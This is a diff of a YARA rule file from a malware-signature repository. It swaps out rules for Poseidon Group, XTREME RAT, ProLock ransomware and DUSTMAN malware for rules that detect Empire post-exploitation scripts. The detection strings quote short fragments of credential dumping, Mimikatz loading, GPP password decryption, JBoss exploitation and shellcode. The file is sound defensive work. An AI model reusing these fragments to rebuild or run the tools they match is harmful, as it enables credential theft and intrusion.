+		date = "2016-11-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L26-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f9f82b4577568d0bd60bac0d3132ed7ffcb338f508a8689f3126f3d2440432ef"
-		score = 80
-		quality = 81
+		logic_hash = "caf65814a1aeb0e14ec6430f7d5692b9c090bdc0d453566f0b0abd703f74bac7"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "3585c3136686d7d48e53c21be61bb2908d131cf81b826acf578b67bb9d8e9350"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
 
 	strings:
-		$s1 = "UploadSmallFileWithStopWatch"
-		$s2 = "UploadPartWithStopwatch"
-		$s3 = "AppVClient"
-		$s4 = "ClientUploader"
-		$s5 = { 46 69 6C 65 43 6F 6E 74 61 69 6E 65 72 2E 46 69 6C 65 41 72 63 68 69 76 65 }
-		$s6 = { 4F 6E 65 44 72 69 76 65 43 6C 69 65 6E 74 2E 4F 6E 65 44 72 69 76 65 }
+		$s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
+		$s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
+		$s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Poseidongroup_Malware : FILE
+rule SIGNATURE_BASE_Empire_Get_Securitypackages : FILE
 {
 	meta:
-		description = "Detects Poseidon Group Malware"
+		description = "Detects Empire component - file Get-SecurityPackages.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fe8b227a-d93d-5540-ba73-3f20358205f6"
-		date = "2016-02-09"
-		modified = "2023-01-27"
-		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poseidon_group.yar#L8-L48"
+		id = "a109eda1-a26d-5cf6-b6b5-1a1a1e770a0a"
+		date = "2016-11-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L43-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "315d540f2d2cb7b55e1a069cef8dd2eeceabcea4a428b33cf520a0f23d3819ea"
-		score = 85
+		logic_hash = "2d63fdcc6713d2f7645b16cf3e79a6e951c7751a10bfa0e2853def47ea9547d2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4"
-		hash2 = "344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3"
-		hash3 = "432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61"
-		hash4 = "8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47"
-		hash5 = "d090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f"
-		hash6 = "d7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb"
-		hash7 = "ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3"
+		hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
 
 	strings:
-		$s1 = "c:\\winnt\\system32\\cmd.exe" fullword ascii
-		$s2 = "c:\\windows\\system32\\cmd.exe" fullword ascii
-		$s3 = "c:\\windows\\command.com" fullword ascii
-		$s4 = "copy \"%s\" \"%s\" /Y" fullword ascii
-		$s5 = "http://%s/files/" ascii
-		$s6 = "\"%s\". %s: \"%s\"." fullword ascii
-		$s7 = "0x0666" fullword ascii
-		$s8 = "----------------This_is_a_boundary$" fullword ascii
-		$s9 = "Server 2012" fullword ascii
-		$s10 = "Server 2008" fullword ascii
-		$s11 = "Server 2003" fullword ascii
-		$a1 = "net.exe group \"Domain Admins\" /domain" fullword ascii
-		$a2 = "net.exe group \"Admins. do Dom" fullword ascii
-		$a3 = "(SVRID=%d)" fullword ascii
-		$a4 = "(TG=%d)" fullword ascii
-		$a5 = "(SVR=%s)" fullword ascii
-		$a6 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
-		$a7 = "net.exe localgroup Administradores" fullword ascii
+		$s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
+		$s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 650KB and 6 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $a* ) )
+		( uint16( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Poseidongroup_Maldoc_1 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Powerdump : FILE
 {
 	meta:
-		description = "Detects Poseidon Group - Malicious Word Document"
+		description = "Detects Empire component - file Invoke-PowerDump.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ab26455a-d468-5a75-a6e2-61701ca3a1df"
-		date = "2016-02-09"
+		id = "d1082a4e-d458-57fb-b332-7c775c8ef2dd"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poseidon_group.yar#L50-L64"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L59-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b"
-		logic_hash = "0d8c255f56bb33b6a720c98727127c07a2d77245b18da381706a40339bebd20b"
-		score = 80
+		logic_hash = "e460d015be54a88d0eb5741a9c32cf6d7a410e0beb5356402af0dd19d1b4c6f2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
 
 	strings:
-		$s1 = "c:\\cmd32dll.exe" fullword ascii
+		$x16 = "$enc = Get-PostHashdumpScript" fullword ascii
+		$x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
+		$x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 500KB and all of them
+		( uint16( 0 ) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Poseidongroup_Maldoc_2 : FILE
+rule SIGNATURE_BASE_Empire_Install_SSP : FILE
 {
 	meta:
-		description = "Detects Poseidon Group - Malicious Word Document"
+		description = "Detects Empire component - file Install-SSP.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9fc0f25e-809d-5803-be39-740ce3a3c85a"
-		date = "2016-02-09"
+		id = "06bbdcc5-c48b-5753-88a2-5c962d1b986f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poseidon_group.yar#L66-L89"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L76-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2c35077a4980336a2c50cade322861dc02f92f7617115420eebe7c882c2f620b"
-		score = 70
+		logic_hash = "bf0966d0141d4606983f267face635ef5fddbc73282f02f0a0ae6fcf89f2e6dc"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c"
-		hash2 = "1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af"
-		hash3 = "f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a"
-		hash4 = "ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed"
-		hash5 = "27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778"
-		hash6 = "1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216"
+		hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
 
 	strings:
-		$s0 = "{\\*\\generator Msftedit 5.41." ascii
-		$s1 = "Attachment 1: Complete Professional Background" ascii
-		$s2 = "E-mail:  \\cf1\\ul\\f1"
-		$s3 = "Education:\\par" ascii
-		$s5 = "@gmail.com" ascii
+		$s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and filesize < 500KB and 3 of them
+		( uint16( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
 }
-
-rule SIGNATURE_BASE_Xtreme_Sep17_1 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Shellcodemsil : FILE
 {
 	meta:
-		description = "Detects XTREME sample analyzed in September 2017"
+		description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7517e237-9cad-5619-9028-4c7ab5463040"
-		date = "2017-09-27"
+		id = "06011b51-bad7-5656-ac37-e49f9b6d0498"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xtreme_rat.yar#L14-L37"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L91-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa78b43f729032291c27f67dc53bd39a85c9a50323c7adf909ca2a8c5acdd861"
+		logic_hash = "eb556fb8b558145e7e981ab3c3ccfb2656512498b917c705e53bc5b9f3650155"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6"
+		hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
 
 	strings:
-		$x1 = "ServerKeyloggerU" fullword ascii
-		$x2 = "TServerKeylogger" fullword ascii
-		$x3 = "XtremeKeylogger" fullword wide
-		$x4 = "XTREMEBINDER" fullword wide
-		$s1 = "shellexecute=" fullword wide
-		$s2 = "[Execute]" fullword wide
-		$s3 = ";open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\" wide
+		$s1 = "$FinalShellcode.Length" fullword ascii
+		$s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
+		$s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
+		$s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "735af2a144f62c50ba8e89c1c59764eb" or ( 1 of ( $x* ) or 3 of them ) )
+		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Xtreme_Sep17_2 : FILE
+rule SIGNATURE_BASE_HKTL_Empire_Powerup : FILE
 {
 	meta:
-		description = "Detects XTREME sample analyzed in September 2017"
+		description = "Detects Empire component - file PowerUp.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b4878e80-54dc-5a16-9129-ddf2b1a5d287"
-		date = "2017-09-27"
+		id = "e79d093e-7481-52a3-a350-4d1b6d8955cd"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xtreme_rat.yar#L39-L53"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L109-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb86167e0267d52b1b7503abd8f5b988296e3cde12453ace529c4e043d2ca69e"
+		logic_hash = "d55674866a1a14d4f4c2b5529e47e005ca4b433383bf112af6da41d7f84afdb7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f8413827c52a5b073bdff657d6a277fdbfda29d909b4247982f6973424fa2dcc"
+		hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
 
 	strings:
-		$s1 = "Spy24.exe" fullword wide
-		$s2 = "Remote Service Application" fullword wide
+		$x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them )
+		( uint16( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Xtreme_Sep17_3 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Mimikatz_Gen : FILE
 {
 	meta:
-		description = "Detects XTREME sample analyzed in September 2017"
+		description = "Detects Empire component - file Invoke-Mimikatz.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "160673ea-b263-520a-a1c1-da0f3e920f12"
-		date = "2017-09-27"
+		id = "1f771a17-2534-5811-80bd-bc1bab37d97c"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xtreme_rat.yar#L55-L69"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L124-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c110863028ab1f557270e52de608179ce582a47e0a20994f83d385ed285bda9a"
+		logic_hash = "a28297025b9b0178ab437996ffd3e0c28526f1edaf61db659093fe41a356cf40"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f540a4cac716438da0c1c7b31661abf35136ea69b963e8f16846b96f8fd63dde"
+		hash1 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
 
 	strings:
-		$s2 = "Keylogg" fullword ascii
-		$s4 = "XTREME" fullword wide
+		$s1 = "= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" ascii
+		$s2 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them )
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-
-rule SIGNATURE_BASE_Xtreme_RAT_Gen_Imp : FILE
+rule SIGNATURE_BASE_Empire_Get_Gpppassword : FILE
 {
 	meta:
-		description = "Detects XTREME sample analyzed in September 2017"
+		description = "Detects Empire component - file Get-GPPPassword.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "10b23099-2a87-5918-927b-f20bcba1cd70"
-		date = "2017-09-27"
+		id = "7791b009-19d3-5d08-8ef7-4723d28830ed"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xtreme_rat.yar#L71-L86"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L140-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9cfd6473e7f8d1f899fe2cdbb49a4086ea7ac6151602d0964ed28b16d2d0188d"
+		logic_hash = "3c879e50805e8b89fc8f3a7c7da2c8e906c89f210ab74194daca6b0ba2d312ba"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7b5082bcc8487bb65c38e34c192c2a891e7bb86ba97281352b0837debee6f1cf"
+		hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
+
+	strings:
+		$s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
+		$s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
+		$s3 = "function Get-DecryptedCpassword {" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "d0bdf112886f3d846cc7780967d8efb9" or pe.imphash ( ) == "cc6f630f214cf890e63e899d8ebabba6" or pe.imphash ( ) == "e0f7991d50ceee521d7190effa3c494e" )
+		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_MAL_Prolock_Malware : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Smbscanner : FILE
 {
 	meta:
-		description = "Detects Prolock malware in encrypted and decrypted mode"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "269bf0c5-8315-5405-8e44-e2cc5507a36a"
-		date = "2020-05-17"
+		description = "Detects Empire component - file Invoke-SmbScanner.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63cd048b-04fd-5b4f-9d4d-3a001c31b4df"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Prolock.Malware.yar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_prolock.yar#L1-L20"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L157-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "da8a0ec683475019daddd4acdd00d4c36eedacad3deef2be4220b86cbf5f9df0"
+		logic_hash = "5feb32dd0fc5271256dc4a088b9b02b591dbe584759db7ee4f5a6c99f42c3c0c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0"
-		hash2 = "dfbd62a3d1b239601e17a5533e5cef53036647901f3fb72be76d92063e279178"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
 
 	strings:
-		$DecryptionRoutine = {01 C2 31 DB B8 ?? ?? ?? ?? 31 04 1A 81 3C 1A}
-		$DecryptedString1 = "support981723721@protonmail.com" nocase ascii
-		$DecryptedString2 = "Your files have been encrypted by ProLock Ransomware" nocase ascii
-		$DecryptedString3 = "msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion" nocase ascii
-		$CryptoCode = {B8 63 51 E1 B7 31 D2 8D BE ?? ?? ?? ?? B9 63 51 E1 B7 81 C1 B9 79 37 9E}
+		$s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
+		$s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0x4D42 ) ) and filesize < 100KB and ( ( $DecryptionRoutine ) or ( 1 of ( $DecryptedString* ) and $CryptoCode ) )
+		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Bluenoroffpos_DLL
+rule SIGNATURE_BASE_Empire_Exploit_Jboss : FILE
 {
 	meta:
-		description = "Bluenoroff POS malware - hkp.dll"
-		author = "Florian Roth"
-		id = "d2b34b50-c7eb-5852-ba5d-734dd5038c2e"
-		date = "2018-06-07"
+		description = "Detects Empire component - file Exploit-JBoss.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a9c75cf5-9469-5a45-b750-69728ed0069f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "http://blog.trex.re.kr/3?category=737685"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_bluenoroff_pos.yar#L2-L20"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L173-L190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "39f23045b3e5ef60c199091b7f01ac2a3a31bcb95219aebb9a4cfd0764886f19"
+		logic_hash = "a0eef14c3966745a0f2b7eb404eed122a11eea2fb82884ebd2087b3ab90bff93"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
 
 	strings:
-		$dll = "ksnetadsl.dll" ascii wide fullword nocase
-		$exe = "xplatform.exe" ascii wide fullword nocase
-		$agent = "Nimo Software HTTP Retriever 1.0" ascii wide nocase
-		$log_file = "c:\\windows\\temp\\log.tmp" ascii wide nocase
-		$base_addr = "%d-BaseAddr:0x%x" ascii wide nocase
-		$func_addr = "%d-FuncAddr:0x%x" ascii wide nocase
-		$HF_S = "HF-S(%d)" ascii wide
-		$HF_T = "HF-T(%d)" ascii wide
+		$s1 = "Exploit-JBoss" fullword ascii
+		$s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
+		$s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
+		$s4 = "http://blog.rvrsh3ll.net" fullword ascii
+		$s5 = "Remote URL to your own WARFile to deploy." fullword ascii
 
 	condition:
-		5 of them
+		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_MAL_ME_Rawdisk_Agent_Jan20_1 : FILE
+rule SIGNATURE_BASE_Empire_Dumpcredstore : FILE
 {
 	meta:
-		description = "Detects suspicious malware using ElRawDisk"
+		description = "Detects Empire component - file dumpCredStore.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0efaae51-1407-5039-9e5a-9c2f13d6a971"
-		date = "2020-01-02"
-		modified = "2022-12-21"
-		reference = "Saudi National Cybersecurity Authority - Destructive Attack DUSTMAN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dustman.yar#L2-L24"
+		id = "cdb87ed4-fa90-5724-b37d-97cf8e4b8326"
+		date = "2016-11-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L192-L207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "90345b8358d72b6616c6277222fb1091cb3a88b844391ac3766e7d1ee1192fbe"
-		score = 65
+		logic_hash = "7136920e531d7ab621e743c5c89c0d817fe453108878e3c808814ca48ad57fb3"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
 
 	strings:
-		$x1 = "\\drv\\agent.plain.pdb" ascii
-		$x2 = " ************** Down With Saudi Kingdom, Down With Bin Salman ************** " fullword ascii
-		$s1 = ".?AVERDError@@" fullword ascii
-		$s2 = "b4b615c28ccd059cf8ed1abf1c71fe03c0354522990af63adf3c911e2287a4b906d47d" fullword wide
-		$s3 = "\\\\?\\ElRawDisk" fullword wide
-		$s4 = "\\??\\c:" wide
-		$op1 = { e9 3d ff ff ff 33 c0 48 89 05 0d ff 00 00 48 8b }
-		$op2 = { 0f b6 0c 01 88 48 34 48 8b 8d a8 }
+		$x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
+		$s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
+		$s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x233c and filesize < 40KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_MAL_ME_Rawdisk_Agent_Jan20_2 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Egresscheck : FILE
 {
 	meta:
-		description = "Detects suspicious malware using ElRawDisk"
+		description = "Detects Empire component - file Invoke-EgressCheck.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9817fb22-7bed-5869-aa92-66c458b81c7f"
-		date = "2020-01-02"
-		modified = "2022-12-21"
-		reference = "https://twitter.com/jfslowik/status/1212501454549741568?s=09"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dustman.yar#L26-L50"
+		id = "21e09250-6853-5743-a6ef-aa6be8091d33"
+		date = "2016-11-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L209-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "73e4a88b749e3b2654e9021290932d2e556c29cfa772785b23bebad9f3a3f90a"
-		score = 65
+		logic_hash = "693564e0bd98ebd03cd433d8ba1003051a5cf6b1f0c05d3c5a4682e6d667327e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
 
 	strings:
-		$x1 = "\\Release\\Dustman.pdb" ascii
-		$x2 = "/c agent.exe A" fullword ascii
-		$s1 = "C:\\windows\\system32\\cmd.exe" fullword ascii
-		$s2 = "The Magic Word!" fullword ascii
-		$s3 = "Software\\Oracle\\VirtualBox" fullword wide
-		$s4 = "\\assistant.sys" wide
-		$s5 = "Down With Bin Salman" fullword wide
-		$sc1 = { 00 5C 00 5C 00 2E 00 5C 00 25 00 73 }
-		$op1 = { 49 81 c6 ff ff ff 7f 4c 89 b4 24 98 }
+		$s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 3000KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x233c and filesize < 10KB and 1 of them ) or all of them
 }
